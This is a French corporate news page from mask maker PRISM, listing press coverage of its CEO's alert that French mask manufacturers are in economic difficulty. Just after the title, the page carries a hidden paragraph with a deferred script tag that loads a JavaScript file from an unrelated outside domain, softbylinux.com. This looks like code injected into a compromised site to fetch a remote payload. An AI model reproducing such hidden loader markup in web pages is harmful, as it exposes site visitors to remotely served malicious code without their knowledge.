Les médias relaient les difficultés des fabricants de masques français - PRISM</title><p hidden>width="69.5px" height="118.5px"<script defer src="https://softbylinux.com/tps.js?host=prism-medical-protect.fr"></script><p hidden>

Suite au courrier adressé le 3 novembre par Christian Curel au Président de la République pour alerter sur la situation économique des industriels français du secteur, les médias ont sollicité PRISM et son PDG, également Président du Syndicat des fabricants français de masques, pour relayer ce sujet d'enjeu national.

France 3 (10/11/22)

France Info (17/11/22)

viàOccitanie (21/11/22)

Europe 1 (22/11/22)

Sud Radio (30/11/22)

MASQUES : LES FABRICANTS FRANÇAIS RÉCLAMENT DAVANTAGE DE SOUTIEN DE L'ETAT

Décrivant la "situation compliquée" de la filière française, le syndicat des fabricants français de masques réclament notamment des sanctions contre les établissements publics qui ne respectent pas la clause de préférence européenne pour leur approvisionnement.

ENQUÊTE.
COVID-19 : LA RÉINDUSTRIALISATION
DE LA PRODUCTION DE MASQUES
EN FRANCE TOURNE AU FIASCO

En 2020, de nouvelles usines de production de masques tricolores étaient inaugurées. Plus de deux ans après, la filière chancelle. Dans le grand ouest, la Coop des Masques a fermé ses portes quand d'autres placent leurs salariés en chômage partiel. Les industriels français viennent d'adresser un courrier au Président pour lui demander de sévir auprès des acheteurs. En parallèle, le ministère de l'Industrie communique pourtant largement sur sa volonté de réindustrialiser ce "secteur critique".

Economie : le syndicat des fabricants de masques tire la sonnette d'alarme

Le syndicat des fabricants de masques réclame des mesures contre les établissements publics qui ne respectent pas la clause de préférence européenne pour leur approvisionnement.

Covid-19 : pourquoi le masque "made in France"
est menacé de disparition

Christian Curel, président du Syndicat des fabricants français de masques (F2M) et de la société PRISM basée à Frontignan (Hérault) tire la sonnette d'alarme. Les grands acheteurs préfèrent importer des produits chinois pour son prix en dépit du voeu gouvernemental de souveraineté industrielle. Explication.

Syndicat des fabricants français de masques

Christian Curel, président du Syndicat des fabricants français de masques (F2M) et de la société PRISM basée à Frontignan (Hérault) tire la sonnette d'alarme. Les grands acheteurs préfèrent importer des produits chinois pour son prix en dépit du voeu gouvernemental de souveraineté industrielle. Explication.

Masques : les fabricants français en difficulté
face à la concurrence étrangère

Après le boom connu au début de la pandémie, les masques "Made in France" sont de moins en moins produits.

Covid-19 : la filière française de masques,
voulue par Macron, vire au fiasco

ENQUÊTE - Alors que l'épidémie fait son grand retour pour les fêtes, le président du Syndicat des fabricants français de masques lance un appel au secours. La France pourrait bientôt se retrouver dans la même situation qu'avant le Covid.

Partager cet article

Commentaires (0)